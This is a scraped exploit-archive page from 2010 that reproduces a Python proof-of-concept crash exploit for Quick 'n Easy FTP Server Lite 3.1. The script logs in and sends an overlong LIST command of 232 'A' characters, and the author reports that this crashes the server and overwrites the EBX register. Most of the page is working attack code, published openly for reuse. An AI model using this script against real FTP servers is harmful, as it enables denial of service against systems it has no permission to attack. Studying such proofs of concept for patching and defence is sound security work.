Home / os / win7

Quick 'n Easy FTP Server Lite Version 3.1 Crash PoC

Posted on 03 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Quick 'n Easy FTP Server Lite Version 3.1 Crash PoC </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
Quick 'n Easy FTP Server Lite Version 3.1 Crash PoC 
===================================================


#!/usr/bin/python
 
print &quot;
############################################################&quot;
print &quot;##        Team Hackers Garage                               ##&quot;
print &quot;##   Quick 'n Easy FTP Server Lite Version 3.1              ##&quot;
print &quot;##              Crash PoC                                   ##&quot;
print &quot;##        Sumit Sharma (aka b0nd)                           ##&quot;
print &quot;##         sumit.iips@gmail.com                             ##&quot;
print &quot;##                                                          ##&quot;
print &quot;##       Special Thanks to: Double_Zero                     ##&quot;
print &quot;##   (http://www.exploit-db.com/author/DouBle_Zer0)         ##&quot;
print &quot;##              &amp;                                           ##&quot;
print &quot;##       Peter Van (CORELAN TEAM)                           ##&quot;
print &quot;##                                                          ##&quot;
print &quot;############################################################&quot;
 
# Summary: The &quot;LIST&quot; command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable
# Tested on: Windows XP SP2
# ftp&gt; ls AAAA... 232 A's...AAA?
# Server Crash!
# Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string).
# No SEH overwrite
# No EIP overwrite
 
 
from socket import *
 
host = &quot;172.12.128.4&quot;       # Virtual Windows XP SP2
port = 21
user = &quot;test&quot;           # &quot;upload&quot; and &quot;download&quot; access
password = &quot;test&quot;
 
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
 
s.send(&quot;user %s
&quot; % (user))
print s.recv(1024)
 
s.send(&quot;pass %s
&quot; % (password))
print s.recv(1024)
 
buffer = &quot;LIST &quot;
buffer += &quot;A&quot; * 232
buffer += &quot;?&quot;
buffer += &quot;
&quot;
 
s.send(buffer)
print s.recv(1024)
s.close()
print &quot;----&gt;&gt;&gt; Server Crash!!!&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :